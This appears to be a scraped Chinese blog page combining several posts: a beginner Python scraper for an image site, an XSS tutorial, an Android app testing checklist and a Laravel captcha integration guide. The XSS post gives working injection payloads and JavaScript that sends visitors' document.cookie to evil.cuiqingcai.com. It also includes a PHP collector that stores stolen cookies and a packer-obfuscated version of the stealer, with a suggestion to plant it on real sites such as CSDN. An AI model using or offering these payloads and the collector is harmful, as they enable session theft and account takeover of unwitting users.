PS: 如果对 requests.get(all_url, headers=headers)感到不解的各位，请务必去再看一遍官方文档哦（解释得很清楚呢）你在你的 IDE 中运行的时候会打印出下面的内容：第一段部分完成啦！！是不感觉超简单！！！！看懂没？没看懂继续瞅瞅、对于看懂的各位小哥儿（妹儿）我只想说··· 小哥儿（妹儿）！你老牛逼了！！没看懂？报错？没关系！看见屏幕右边那个群号没？加它！热心的群友会为你耐心解答滴············ 好啦！第一部分获取网页的部分完成啦！我们来开始第二部分提取我们想要的内容吧！！在 Chrome 中打开我们第一部分请求的网址：http://www.mzitu.com/all 、按下 F12 调出 Chrome 的开发者调试工具（不熟练的同学一定要去了解一下哦！爬虫中绝大部分工作要靠这个来完成呢！是必备技能哦！）是这样：看见图中那句话没？没看见？仔细看看那可是我们必须要使用的工具哦！！好啦下面我们看看使用方法好啦、我们就是通过这种方法来找到我们需要的数据在那一个标签里面的、方便后面提取出来啦！（实例很简陋看不懂的童鞋百度一下啦！教程很多的）你会发现这个页面并没有我们需要的图片地址啊！没有那么怎么办呢？上面那张超级简陋的流程图看了嘛？没看？赶快去瞅瞅·· 你就知道我们该干啥啦！嗯，我们需要找到图片地址所在的页面！观察一下网页你会发现图片页面的地址全部都在

...

标签中、（讲真！这么良心，还这么有规律的网页不多了啊！）不信啊?你展开

标签瞅瞅就知道啦

点开

标签你会发现图片页面的地址在标签的 href 属性中、主题在标签中（搞不清楚的这两个的区别的同学、去了解一下 html 的基础啦！）实现逻辑就是：先找到页面中的全部

标签、然后提取出中间标签的 href 属性值与标签的类容，前者我们用来继续请求 html 看看会不会有我们需要的图片下载地址，后者我们存储的时候给文件夹命名使用。可能有小哥儿（妹儿）会问，为什么不直接查找标签？你观察一下网页就知道呐！还有其他地方使用了标签，如果直接查找标签就会多出很多我们不需要的东西，也不方便我们提取想要的东西，先查找

标签就是限制一下标签的范围啦！通过上面的方法、知道了需要的数据的位置！该我们的beautifulsoup来大展身手啦！！！加上上面的一段代码现在应该是这样的啦！看不懂？没关系看注释看注释。

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os



headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
#print(start_html.text) ##打印出start_html (请注意，concent是二进制的数据，一般用于下载图片、视频、音频、等多媒体内容是才使用concent, 对于打印网页内容请使用text)
Soup = BeautifulSoup(start_html.text, 'lxml') ##使用BeautifulSoup来解析我们获取到的网页（‘lxml’是指定的解析器 具体请参考官方文档哦）
li_list = Soup.find_all('li') ##使用BeautifulSoup解析网页过后就可以用找标签呐！（find_all是查找指定网页内的所有标签的意思，find_all返回的是一个列表。）
for li in li_list: ##这个不解释了。看不懂的小哥儿回去瞅瞅基础教程
    print(li) ##同上

运行一下试试！诶！！！不对啊！！抓到了我们不需要的东西啊！！！这可怎么办啊！！别急别急！我们再去看看网页的 F12 瞅瞅。找到啦！原来有其他地方有

标签、观察不仔细啦！现在我们怎么办？我们再去 F12 瞅瞅！

哈哈！这就简单了，我们推翻上面的思路现在我们先找到

这个标签，然后直接找标签！诶！不对啊！怎么直接找标签了！上面的

标签呢！！你仔细瞅瞅网页！在

这个模块里面的标签的全是我们需要的东西，就不需要

标签来限制提取范围啦！所以就直接扔掉了不用了。也方便写代码啊。现在我们改改上面的代码！

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os

headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
#print(start_html.text) ##打印出start_html (请注意，concent是二进制的数据，一般用于下载图片、视频、音频、等多媒体内容是才使用concent, 对于打印网页内容请使用text)
Soup = BeautifulSoup(start_html.text, 'lxml') ##使用BeautifulSoup来解析我们获取到的网页（‘lxml’是指定的解析器 具体请参考官方文档哦）
#li_list = Soup.find_all('li') ##使用BeautifulSoup解析网页过后就可以用找标签呐！（find_all是查找指定网页内的所有标签的意思，find_all返回的是一个列表。）
#for li in li_list: ##这个不解释了。看不懂的效小哥儿回去瞅瞅基础教程
    #print(li) ##同上
all_a = Soup.find('div', class_='all').find_all('a') ##意思是先查找 class为 all 的div标签，然后查找所有的<a>标签。
for a in all_a:
    print(a)

PS: ‘find’ 只查找给定的标签一次，就算后面还有一样的标签也不会提取出来哦！而 ‘find_all’ 是在页面中找出所有给定的标签！有十个给定的标签就返回十个（返回的是个 list 哦！！）,想要了解得更详细，就是看看官方文档吧！来看看运行结果！哇哦！！全是我们需要的类容诶！什么？你的和这个不一样？或者报错了？回头看看你做的和我有什么不一样······ 实在不行，群里求助吧！好啦！现在我们该来提取我们想要的内容了！又该我们 BeautifulSoup 大展身手了。我们需要提取出标签的 href 属性和文本。怎么做呢？看代码!

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os

headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
#print(start_html.text) ##打印出start_html (请注意，concent是二进制的数据，一般用于下载图片、视频、音频、等多媒体内容是才使用concent, 对于打印网页内容请使用text)
Soup = BeautifulSoup(start_html.text, 'lxml') ##使用BeautifulSoup来解析我们获取到的网页（‘lxml’是指定的解析器 具体请参考官方文档哦）
#li_list = Soup.find_all('li') ##使用BeautifulSoup解析网页过后就可以用找标签呐！（find_all是查找指定网页内的所有标签的意思，find_all返回的是一个列表。）
#for li in li_list: ##这个不解释了。看不懂的效小哥儿回去瞅瞅基础教程
    #print(li) ##同上
all_a = Soup.find('div', class_='all').find_all('a') ##意思是先查找 class为 all 的div标签，然后查找所有的<a>标签。
# 页面更改 多了一个早期图片 需要删掉（小伙伴们 可以自己尝试处理一下这个页面）
all_a.pop(0)
# 上面是删掉列表的第一个元素
for a in all_a:
    title = a.get_text() #取出a标签的文本
    href = a['href'] #取出a标签的href 属性
    print(title, href)

就多了两行！很方便吧！！为什么这么写？自己去看官方文档啦！（我要全解释了，估计有些小哥儿官方文档都不会去看。这样很不好诶。）来来！看看结果怎么样我们来打印一下看看！哈哈果然是我们想要的内容！我们已经找向目标前进了一半了！好啦前面已经把怎么实现的方法讲清楚了哦（如果你觉得什么地方有问题或者不清楚，在群里说说我好改改）下面就要开始加快节奏了！！（篇幅长了会被人骂的！）上面我们找到了图片的标题（暂时不管，这是后面用来创建文件夹的）和图片页面的地址（这是我们这一步需要做的），需要做什么请参考最上面那个超简陋的流程图。先查看一下图片页面有什么东西你会发现一个页面只有一张图片啊！想要下载一套啊！你点一下面的 1 、2、3、4········ 你会发现地址栏里面的 URL 在变化啊！这就是我们的入手的地方了！页码在标签中，我们只需要获取最后一个页面的页码，从 1 开始历遍，和我们上面获取的 URL 拼接在一起就是每张图片的页面地址啦！在页面的源代码搜一下标签 [![QQ截图20161028191747](http://cdn.cuiqingcai.com/wp-content/uploads/2016/10/QQ截图20161028191747-1024x554.png)](http://cdn.cuiqingcai.com/wp-content/uploads/2016/10/QQ截图20161028191747.png) 可以发现最后一个页面的标签是第二十一个标签，因为在 html 中标签是成对的，所以我需要查找的是第十一个标签（BeautifulSoup 是以开始的标签定位，而不是结尾的。开始的标签是这样<>；结束的标签是这样）废话不多说上代码！ PS：下面的代码我已经把注释掉的删掉了，所以看起来和上面的不太一样。

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os


headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
Soup = BeautifulSoup(start_html.text, 'lxml') ##使用BeautifulSoup来解析我们获取到的网页（‘lxml’是指定的解析器 具体请参考官方文档哦）
all_a = Soup.find('div', class_='all').find_all('a') ##意思是先查找 class为 all 的div标签，然后查找所有的<a>标签。
# 页面更改 多了一个早期图片 需要删掉（小伙伴们 可以自己尝试处理一下这个页面）
all_a.pop(0)
# 上面是删掉列表的第一个元素
for a in all_a:
    title = a.get_text() #取出a标签的文本
    href = a['href'] #取出a标签的href 属性
    html = requests.get(href, headers=headers) ##上面说过了
    html_Soup = BeautifulSoup(html.text, 'lxml') ##上面说过了
    max_span = html_Soup.find('div', class_='pagenavi').find_all('span')[-2].get_text() ##查找所有的<span>标签获取第十个的<span>标签中的文本也就是最后一个页面了。
    for page in range(1, int(max_span)+1): ##不知道为什么这么用的小哥儿去看看基础教程吧
        page_url = href + '/' + str(page) ##同上
        print(page_url) ##这个page_url就是每张图片的页面地址啦！但还不是实际地址！

好啦！运行一下试试！就是下面这样: 完美！！每个页面的地址都出来啦！！！下面开始找图片的实际地址啦！随意打开上面的地址地用 F12 调试工具试试！会发现我们需要的地址在

中的标签的 src 属性中。是不是很眼熟啊！知道怎么写了吧？下面上代码：

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os


headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
Soup = BeautifulSoup(start_html.text, 'lxml') ##使用BeautifulSoup来解析我们获取到的网页（‘lxml’是指定的解析器 具体请参考官方文档哦）
all_a = Soup.find('div', class_='all').find_all('a') ##意思是先查找 class为 all 的div标签，然后查找所有的<a>标签。
# 页面更改 多了一个早期图片 需要删掉（小伙伴们 可以自己尝试处理一下这个页面）
all_a.pop(0)
# 上面是删掉列表的第一个元素
for a in all_a:
    title = a.get_text() #取出a标签的文本
    href = a['href'] #取出a标签的href 属性
    html = requests.get(href, headers=headers) ##上面说过了
    html_Soup = BeautifulSoup(html.text, 'lxml') ##上面说过了
    max_span = html_Soup.find('div', class='pagenavi').find_all('span')[-2].get_text() ##查找所有的<span>标签获取第十个的<span>标签中的文本也就是最后一个页面了。
    for page in range(1, int(max_span)+1): ##不知道为什么这么用的小哥儿去看看基础教程吧
        page_url = href + '/' + str(page) ##同上
        img_html = requests.get(page_url, headers=headers)
        img_Soup = BeautifulSoup(img_html.text, 'lxml')
        img_url = img_Soup.find('div', class_='main-image').find('img')['src'] ##这三行上面都说过啦不解释了哦
        print(img_url)

运行一下完美！就是我们想要的东西，下面开始保存了哦！哈哈！妹子马上就可以到你碗里去了！首先我们要给每套图建一个文件夹，然后将下载的图片以 URL 的 xxxxx.jpg 中的 xxxxx 命名保存在这个文件夹里面。直接上代码了！

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os


headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
Soup = BeautifulSoup(start_html.text, 'lxml') ##使用BeautifulSoup来解析我们获取到的网页（‘lxml’是指定的解析器 具体请参考官方文档哦）
all_a = Soup.find('div', class_='all').find_all('a') ##意思是先查找 class为 all 的div标签，然后查找所有的<a>标签。
# 页面更改 多了一个早期图片 需要删掉（小伙伴们 可以自己尝试处理一下这个页面）
all_a.pop(0)
# 上面是删掉列表的第一个元素
for a in all_a:
    title = a.get_text() #取出a标签的文本
    path = str(title).strip() ##去掉空格
    os.makedirs(os.path.join("D:\mzitu", path)) ##创建一个存放套图的文件夹
    os.chdir("D:\mzitu\\"+path) ##切换到上面创建的文件夹
    href = a['href'] #取出a标签的href 属性
    html = requests.get(href, headers=headers) ##上面说过了
    html_Soup = BeautifulSoup(html.text, 'lxml') ##上面说过了
    max_span = html_Soup.find('div', class_='pagenavi').find_all('span')[-2].get_text() ##查找所有的<span>标签获取第十个的<span>标签中的文本也就是最后一个页面了。
    for page in range(1, int(max_span)+1): ##不知道为什么这么用的小哥儿去看看基础教程吧
        page_url = href + '/' + str(page) ##同上
        img_html = requests.get(page_url, headers=headers)
        img_Soup = BeautifulSoup(img_html.text, 'lxml')
        img_url = img_Soup.find('div', class_='main-image').find('img')['src'] ##这三行上面都说过啦不解释了哦
        name = img_url[-9:-4] ##取URL 倒数第四至第九位 做图片的名字
        img = requests.get(img_url, headers=headers)
        f = open(name+'.jpg', 'ab')##写入多媒体文件必须要 b 这个参数！！必须要！！
        f.write(img.content) ##多媒体文件要是用conctent哦！
        f.close()

好了！！来运行一下哈哈哈完美！！！以上完毕！下面我们来整理一下代码，弄个函数什么的提示下逼格！加点提示什么的首先我们上面 requests 一共使用了三次，我们写一个函数复用（别怕！一点都不难）

def request(url):
    headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}
    content = requests.get(url, headers=headers)
    return content

当调用 request 的时候会获取 URL 地址的网页然后返回获取到的 response （response 是啥？你理解成请求网页地址返回的源码就好了！注意：如果请求的是多媒体文件的话 response 返回的是二进制文件哦！）哈哈！第一个就写好啦，简单吧！第二个是创建文件

def mkdir(self, path):
        path = path.strip()
        isExists = os.path.exists(os.path.join("D:\mzitu", path))
        if not isExists:
            print(u'建了一个名字叫做', path, u'的文件夹！')
            os.makedirs(os.path.join("D:\mzitu", path))
            return True
        else:
            print(u'名字叫做', path, u'的文件夹已经存在了！')
            return False

调用 mkdir 这个函数时，会在 D:\mzitu 文件下创建一个 path 这个参数的文件夹（是参数不是 path 哦！就是你调用的时候传递什么参数给这个函数就创建什么文件夹！这个函数可以存着，下载东西到本地都可以用），另外一个好处就是在文件夹已经存在的情况下不会报错退出程序哦！不使用就会诶！好啦剩下的我就一股脑的写出来了！ PS: 感谢Lucibriel的提醒！（因为我的程序就在 D 盘，所以疏忽了程序没在 D 盘 os.chdir() 不能切换目录的问题、已经就改过来了；非常抱歉。）

import requests
from bs4 import BeautifulSoup
import os

class mzitu():

    def __init__(self):
        self.headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"}
    def all_url(self, url):
        html = self.request(url)##调用request函数把套图地址传进去会返回给我们一个response
        all_a = BeautifulSoup(html.text, 'lxml').find('div', class_='all').find_all('a')
        # 页面更改 多了一个早期图片 需要删掉（小伙伴们 可以自己尝试处理一下这个页面）
        all_a.pop(0)
        # 上面是删掉列表的第一个元素
        for a in all_a:
            title = a.get_text()
            print(u'开始保存：', title) ##加点提示不然太枯燥了
            path = str(title).replace("?", '_') ##我注意到有个标题带有 ？  这个符号Windows系统是不能创建文件夹的所以要替换掉
            self.mkdir(path) ##调用mkdir函数创建文件夹！这儿path代表的是标题title哦！！！！！不要糊涂了哦！
            href = a['href']
            self.html(href) ##调用html函数把href参数传递过去！href是啥还记的吧？ 就是套图的地址哦！！不要迷糊了哦！

    def html(self, href):   ##这个函数是处理套图地址获得图片的页面地址
        html = self.request(href)
        self.headers['referer'] = href
        max_span = BeautifulSoup(html.text, 'lxml').find('div', class_='pagenavi').find_all('span')[-2].get_text()
        for page in range(1, int(max_span) + 1):
            page_url = href + '/' + str(page)
            self.img(page_url) ##调用img函数

    def img(self, page_url): ##这个函数处理图片页面地址获得图片的实际地址
        img_html = self.request(page_url)
        img_url = BeautifulSoup(img_html.text, 'lxml').find('div', class_='main-image').find('img')['src']
        self.save(img_url)

    def save(self, img_url): ##这个函数保存图片
        name = img_url[-9:-4]
        img = self.request(img_url)
        f = open(name + '.jpg', 'ab')
        f.write(img.content)
        f.close()

    def mkdir(self, path): ##这个函数创建文件夹
        path = path.strip()
        isExists = os.path.exists(os.path.join("D:\mzitu", path))
        if not isExists:
            print(u'建了一个名字叫做', path, u'的文件夹！')
            os.makedirs(os.path.join("D:\mzitu", path))
            os.chdir(os.path.join("D:\mzitu", path)) ##切换到目录
            return True
        else:
            print(u'名字叫做', path, u'的文件夹已经存在了！')
            return False

    def request(self, url): ##这个函数获取网页的response 然后返回
        content = requests.get(url, headers=self.headers)
        return content

Mzitu = mzitu() ##实例化
Mzitu.all_url('http://www.mzitu.com/all') ##给函数all_url传入参数  你可以当作启动爬虫（就是入口）

完美！！好啦！结束了！如果大家觉得还能看懂、还行的话我后面在写点儿其他的。给大家看看我的成果最后感谢 mzitu.com 的站长。后续几篇：

小白爬虫第二弹之健壮的小爬虫

小白爬虫第三弹之去重去重

小白爬虫第四弹之爬虫快跑（多进程+多线程）

小白进阶之 Scrapy 第一篇

小白进阶之 Scrapy 第二篇（登录篇）

Scrapy 分布式的前篇–让 redis 和 MongoDB 安全点

小白进阶之 Scrapy 第三篇基于 Scrapy-Redis 的分布式以及 cookies 池

作者哎哟卧槽发表于 2016-10-28 阅读次数：本文字数： 15k 阅读时长 ≈ 14 分钟

JavaScript Web安全学习一之XSS漏洞的利用

什么是XSS

XSS 意为跨站脚本攻击(Cross Site Scripting)，缩写应该是CSS，但是已经有了一个层叠样式表(Cascading Style Sheets)，所以就叫它XSS了。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的，最常见的就是拿到攻击者的 Cookie 然后就可以登录别人的账号了。

XSS实例

最简单的形式就是从URL中直接插入恶意的 JavaScript 代码，最简单的实例如下：

<?php

$input = $_GET['info'];
echo $input;

服务端接收到了数据并执行了输出操作。这样的话就完全可以利用了，你可以向参数输入任意代码。这个服务端的测试用例网址是 http://res.cuiqingcai.com/hack/xss1.php 你可以直接在参数后面加入 JavaScript 代码，例如 http://res.cuiqingcai.com/hack/xss1.php?info=%3Cscript%3Ealert(%27hello%27)%3C/script%3E%3C/script%3E) 直接打开便实现了最简单的 XSS 攻击，不过有的浏览器对此种攻击方式执行了过滤，例如 Chrome, Firefox。有的未执行过滤的浏览器是可以正常演示的。正常的结果应该是输出一个提示框。接下来再演示另一种攻击方式。测试网址是 http://res.cuiqingcai.com/hack/xss2.html 源代码如下

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>TEST XSS</title>
</head>
<body>
    <script>
        function test() {
            var text = document.getElementById('text').value;
            var new_text = '<a href="' + text + '">test</a>';
            console.log(new_text);
            document.getElementById('content').innerHTML = new_text;
        }
    </script>
<div id="content"></div>
<input type="text" id="text" value="">
<input type="button" id="button" value="提交" onclick="test()">
</body>
</html>

现在有一个输入框，点击按钮之后会将输入框的内容提取出来，然后拼凑到超链接标签里。在这里也可以执行XSS攻击。比如输入

1	javascript:void(0)" onclick=alert('ssss') "

提交之后会出现一个超链接，点击之后就可以执行你输入的代码，这次就弹出一个输入框。当然你也可以插入一张图片，用 onerror 属性定义方法

1	"><img src="#" onerror=alert(/xss/)><meta class="

也可以达到同样的效果。那么接下来来了，我们可以利用这个漏洞来盗取Cookie。盗取Cookie可以这样，在本地执行一个JavaScript脚本，然后请求恶意网址，恶意网址的参数就是本网址通过 document.cookie 获取的本地cookie，这样 cookie 就保存在恶意网站上了。这样的话，我们可以写一个脚本。

var img = document.createElement('img');
img.src = 'http://evil.cuiqingcai.com/cookie.php?url='+escape(window.location.href)+'&content='+escape(document.cookie);
img.style = 'display:none';
document.body.appendChild(img);

创建一张图片，然后图片的链接是一个恶意网址加当前的cookie，然后添加到网页里。这样，新增加的一个网页便会请求这个src，实现访问。然后还是原来的实例，我们想在代码里执行这段JavaScript，那怎么办呢？直接创建一个script节点引用？先把这段js保存成 http://evil.cuiqingcai.com/cookie.js，试一下。输入

1	javascript:void(0)"></a><script src="//evil.cuiqingcai.com/cookie.js"></script><a class="

测试之后，发现并不能行。原因是插入script标签后，并不会自动请求这个链接。这样我们就需要再次借助图片这个神奇的东西来帮忙了。输入

1	javascript:void(0)"></a><img src=# onerror="document.body.appendChild(document.createElement('script')).src='//evil.cuiqingcai.com/cookie.js'"><a class="

这里创建了一张图片，然后利用 onerror 方法插入了一个 script 标签，引入这个JS文件，这样就可以正常加载了。嗯，那么这样就做到了将cookie传递给一个恶意网址。真正的盗取是在这里的。那么 http://evil.cuiqingcai.com/cookie.php 的内容是什么？

<?php 

session_start();

$_SESSION['attempt'] = isset($_SESSION['attempt'])?$_SESSION['attempt']:0;

$_SESSION['attempt'] += 1;

if ($_SESSION['attempt'] >= 100) {
	die("Too Frequent");
}

$mysqli = new mysqli("localhost", "root", "", "evil");
if ($mysqli->connect_errno) {
    echo "Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error;
}

$url = $_GET['url'];
$content = $_GET['content'];

$time = date("Y-m-d H:i:s", time());

$items = explode(";", $content);

$js = '';

foreach ($items as $item) {
	$js .= ("document.cookie='".trim($item)."';");
}

if ($url && $content && $stmt = $mysqli->prepare("insert into cookies(url, content, time, js) values (?, ?, ?, ?)")) {
    $stmt->bind_param("ssss", $url, $content, $time, $js);
    $result = $stmt->execute();
    if ($result) {
    	echo "Collected Your Cookie <br>" ;
    }
}

echo 'url:', $url, '<br>', 'content:', $content;

其实就是获取了url，还有cookie内容，然后插入了数据库保存起来。这样，每成功一个XSS，就可以成功捕获到某个网站的Cookie。

混淆加密

其实将刚才的cookie.js贴到任意的网站都有可能引起XSS，比如CSDN。为了防止JavaScript被看出来，可以利用在线加密网站加密。http://tool.chinaz.com/js.aspx 比如上面一段代码就被加密成这样，粘贴到控制台，就能成功获取Cookie了。

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('9 0=1.8(\'0\');0.a=\'c://b.5.7/3.4?6=\'+2(j.i.l)+\'&k=\'+2(1.3);0.h=\'e:d\';1.g.f(0);',22,22,'img|document|escape|cookie|php|cuiqingcai|url|com|createElement|var|src|evil|http|none|display|appendChild|body|style|location|window|content|href'.split('|'),0,{}))

作者崔庆才发表于 2016-09-28 阅读次数：本文字数： 4.3k 阅读时长 ≈ 4 分钟

Other APP测试要点整理

1、冒烟测试

使用的工具

Monkey

目标

（1）编写adb.exe的Monkey命令。（2）通过logcat定位问题，保证软件的健壮性。

1.1 内存泄漏测试

关注app的启动时间，页面加载时间，主要功能占用的CPU，内存，流量，与同类产品比较是否有优势。工具：DDMS

1.2 联机调试测试

连接真机进入调试模式，测试业务流；通过Logcat记录个操作，将所有错误定位代码。

1.3 外网测试

要覆盖到WIFI\2G\3G、net\wap 、电信\移动\联网,所有组合进行测试

2、安装、卸载测试

2.1 安装卸载

app安装、卸载、启动、运行、清除缓存/数据运行看看是否正常

2.2 平台支持

是否支持豌豆荚、91等主流辅助工具，及是否和第三方软件兼容。

3、在线升级测试

3.1 在线升级安装及使用测试

（1）验证数字签名；（2）升级后是否可以正常使用；（3）在线夸版本升级。

4、业务功能测试

4.1 业务逻辑测试

运行app时，是否可以接电话，发短信，锁屏，充电等功能

4.2 功能点测试

检查功能点是否正常，是否满足需求文档

4.3 关联性测试

安装app后，是否和pc机连接，交互正常

5、稳定性及异常性测试

5.1 交互性测试

手机被多种打扰，例如，打开微信，聊QQ，听音乐等，app是否运行正常；待机，插拔数据线等操作

5.2 异常性测试

断点、断网异常情况，是否稳定

6、性能测试

6.1 基准性能测试

主要是写脚本，是否可以进行压力测试；在不同网络的情况下，运行速度变化情况。

6.2 大数据量测试

保证手机更新大数据量程序成功率

7、界面易用性测试

7.1 界面与交互性测试

符合安卓交互规范；用户体验良好；使用方便。快捷

7.2 可用性测试

可用性强，操作简单；使用操作错误率低；完成任务使用时间短

8、自动化测试

CTS工具，主要是基于Androidinstrumentation和JUnit测试原理推单元测试用例； Monkey用来对UI进行压力测试，伪随机的模拟用户的按键输入，触摸屏输入，手势输入等； ASE工具，是调用Android的功能，从而定制一些测试，比如打电话，发短信，浏览网页等； Robotium工具，提供了模仿用户操作行为的API，比如在某个控件上点击，输入Text等等； MonkeyRunner工具，是调用一个Python脚本去安装一个Android应用程序或测试包，运行它，向它发送模拟按键，截取界面图片等 QQ交流群：369353583

作者路由新定发表于 2016-08-02 阅读次数：本文字数： 986 阅读时长 ≈ 1 分钟

PHP 极验验证码(Geetest) Laravel 5 集成开发包, 滑动二维码让验证更安全

简述

在网站开发中使用频率最高的工具之一便是验证码，验证码在此也是多种多样，不过简单的图片验证码已经可以被机器识别，极验验证码提供了一个安全可靠的滑动验证码体系，让网站开发更加安全。先感受一下这种验证码的魅力极验接入极验验证码的过程并没有想象中的那么简单，如果想在Laravel5中使用，可以使用Laravel5的极验验证码包 LaravelGeetest 支持 Laravel 5.0 及以上版本。地址： https://github.com/Germey/LaravelGeetest 建议阅读原项目的README文件，最新的更新都会在README中说明，而且用法介绍是最全面的。下面简单介绍一下该工具包的使用。

注册极验账号

首先需要到极验网站注册账号，然后新建一个应用，获取到 ID 和 KEY，留作备用，后台管理页面如下。

安装

在项目地址输入命令

1	$ composer require germey/geetest

就可以完成该包的安装或者可以在 composer.json 的 require 中添加

1	"germey/geetest": "~2.0"

然后执行

1	$ composer update

同样可以完成该包的安装。

配置

1	Germey\Geetest\GeetestServiceProvider::class

在 aliases 中添加

1	'Geetest' => Germey\Geetest\Geetest::class

然后执行

1	$ php artisan vendor:publish

会生成一个配置文件，config/geetest.php 和视图文件views/vendor/geetest，视图文件中你可以自定义配置，比如修改一下验证失败后的alert函数，修改为你想要的提示toast等。

使用

首先把刚才拿到的 ID 和 KEY 配置到 .env 文件中，因为这两个算私密内容，配置到 .env 文件中可以保证安全性。在 .env 中写入如下两行。

1 2	GEETEST_ID=0f1097bef7xxxxxx9afdeced970c63e4 GEETEST_KEY=c070f0628xxxxxxe68e138b55c56fb3b

其中 ID 和 KEY 换成你自己的。然后，在任意的视图里，我们只需要调用

1	{!! Geetest::render() !!}

就可以得到验证码了。比如我们最常用的表单里

<form action="/" method="post">
    <input name="_token" type="hidden" value="{{ csrf_token() }}">
    <input type="text" name="name" placeholder="name">
    {!! Geetest::render() !!}
    <input type="submit" value="submit">
</form>

通过如上代码就可以完成验证码的生成了，样例如下：另外还可以指定验证码的另外两种样式。

1 2	{!! Geetest::render('embed') !!} {!! Geetest::render('popup') !!}

以上两个方法分别会生成嵌入式和弹出式验证码。如果没有参数，默认是浮动式。关于这几种样式，可以参考官网这样，就能保证必须完成验证码操作才能提交表单。好，至此，你就可以完成最基础的验证码配置了。

服务端验证

如果你完成了上面的部分，那么恭喜你已经成功了一大半了，可以到此为止，不过如果想更加安全，请继续往下看。在此是服务端二次验证，在上面讲的方法是客户端的验证，但是这并不能代表绝对安全，一些恶意用户依然可以通过操作JS完成表单的提交，所以服务端我们需要再次验证一下。在表单提交的时候，如果你用了极验，那么就会额外提交三个字段，分别是 geetest_challenge, geetest_validate, geetest_seccode, 利用这三个字段，我们可以重新核对操作是否合法。在这里这个包又做了封装，提供了一条验证规则。所以验证时我们只需要利用验证规则即可。

use Illuminate\Http\Request;

class BaseController extends Controller 
{
  /**
   * @param Request $request
   */
  public function postValidate(Request $request)
  {
    $result = $this->validate($request, [
      'geetest_challenge' => 'geetest',
    ], [
      'geetest' => config('geetest.server_fail_alert')
    ]);
    if ($request) {
      return 'success';
    }
  }
}

利用 validate 方法，通过验证其中一个字段 geetest_challenge, 验证规则 geetest 就可以完成服务端的验证。这样就更保证了安全性。在这里注意，由于多提交了几个字段，如果想执行 ORM 的批量插入修改操作时，记得在 Model 里面屏蔽这几个字段

1	protected $guarded = ['geetest_challenge', 'geetest_validate', 'geetest_seccode'];

通过以上方法，就完成了服务端验证。关于更多使用方法，可以参考 README

语言设置

验证码提供五种语言，简体中文，繁体中文，英文，日文，韩文。可以通过 config/geetest.php 中设置 lang 字段。

zh-cn (简体中文)
zh-tw (繁体中文)
en (英文)
ja (日文)
ko (韩文)

修改提示语

